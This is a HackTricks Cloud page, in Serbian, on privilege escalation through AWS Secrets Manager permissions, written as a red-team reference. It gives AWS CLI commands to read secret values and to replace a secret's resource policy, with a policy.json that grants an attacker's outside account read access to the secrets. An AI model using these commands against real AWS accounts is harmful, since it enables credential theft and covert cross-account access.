AWS - Secrets Manager Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Secrets Manager

Za više informacija o secrets manager-u pogledajte:

AWS - Secrets Manager Enum

`secretsmanager:GetSecretValue`

Napadač sa ovom dozvolom može dobiti sačuvanu vrednost unutar tajne u AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potencijalni uticaj: Pristup visoko osetljivim podacima unutar AWS secrets manager servisa.

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

Sa prethodnim dozvolama moguće je dati pristup drugim principalima/računima (čak i spoljnim) da pristupe tajni. Imajte na umu da da bi se pročitali tajne koje su enkriptovane KMS ključem, korisnik takođe mora imati pristup KMS ključu (više informacija na KMS Enum stranici).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousAWS - Sagemaker Privesc NextAWS - SSM Privesc

Last updated 3 days ago

Secrets Manager

secretsmanager:GetSecretValue

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Secrets Manager

secretsmanager:GetSecretValue

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

`secretsmanager:GetSecretValue`

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

`secretsmanager:GetSecretValue`

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)